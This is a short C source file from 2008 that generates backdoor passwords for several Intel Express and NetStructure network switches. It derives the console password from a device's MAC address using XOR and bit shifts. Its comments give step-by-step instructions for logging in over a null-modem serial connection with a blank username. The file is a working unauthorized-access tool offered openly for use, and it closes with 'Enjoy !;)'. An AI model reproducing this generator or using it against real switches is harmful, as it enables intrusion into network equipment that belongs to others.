/*
** intel_backdoor.c
** 
** Made by Raffaello Pelagalli
** 
** Started on  Sat May 17 01:10:21 2008 Raffaello Pelagalli
** Last update Sat May 17 02:43:20 2008 Raffaello Pelagalli
** 
** This library is free software; you can redistribute it and/or
** modify it under the terms of the GNU Lesser General Public
** License as published by the Free Software Foundation; either
** version 2.1 of the License, or (at your option) any later version.
** 
** This library is distributed in the hope that it will be useful,
** but WITHOUT ANY WARRANTY; without even the implied warranty of
** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
** Lesser General Public License for more details.
** 
** You should have received a copy of the GNU Lesser General Public
** License along with this library; if not, write to the Free Software
** Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA
** 02111-1307  USA
*/


/* 
** This program generate a generic password depending on the device's mac address.
**
** It should work with :
** Intel(R) Express 330T Hub with Management Module
** Intel(R) NetStructure(TM) 470T/470F Switches
** Intel(R) Express 460T Standalone Switch
** Intel(R) Express 530T/535T Stackable Switches
**
** To use the backdoor password, connect to the switch's management console interface usind a null
** modem cable. Leave the username field blank, and enter the password. Password is case sensitive 
** and "0" is zero. This backdoor will not work with telnet nor web interface.
**
*/

#include <stdio.h>
#include <string.h>

int is_valid_mac_addr(char *s) {
  if (strlen(s) != 12)
    return (0);
  s--;
  while (*++s) {
    if ((*s >= '0' && *s <= '9') ||
        (*s >= 'a' && *s <= 'f') ||
        (*s >= 'A' && *s <= 'F'))
      continue;
    return (0);
  }
  return (1);
}

int main(int ac, char **av) {
  char buffer[13];
  unsigned char mac[6]; 
  int i;
  int loop_nb = 2;

  printf("\n"
         "Backdoor password generator for INTEL(R) Switches\n"
         "---------------http://redstack.net---------------\n"
         "      More informations in the source code\n\n");
  
  if (ac != 2)
    {
      printf ("Usage: %s <switch MAC address>\n", *av);
      return (0);
    }

  /* Read MAC address */
  if (!is_valid_mac_addr(av[1]))
    {
      printf ("Bad MAC Address\nMAC should be in form '009027010203'\n");
      return (0);
    }
  strcpy(buffer, av[1]);
  for (i = 6; i; i--)
    {
      mac[i - 1] = strtol(buffer + i*2 - 2, 0, 16);
      buffer[i*2 - 2] = 0;
    }

  printf("Your MAC : %.2X%.2X%.2X%.2X%.2X%.2X\n", mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]);
  
  /* Compute Password */
  while (loop_nb--) 
    {
      for (i = 0; i < 3; i++)
        {
          mac[i+3] = ~(mac[i] ^ mac[i+3]);
        }
      unsigned char ret = mac[3] >> 7;
      for (i = 3; i < 6; i++)
        {
          mac[i] = mac[i] << 1;
        }
      mac[5] = mac[5] ^ ret;
    }

  printf("Your Password : %.2X%.2X%.2X", mac[3], mac[4], mac[5]);
  printf("\nEnjoy !;)\n");
}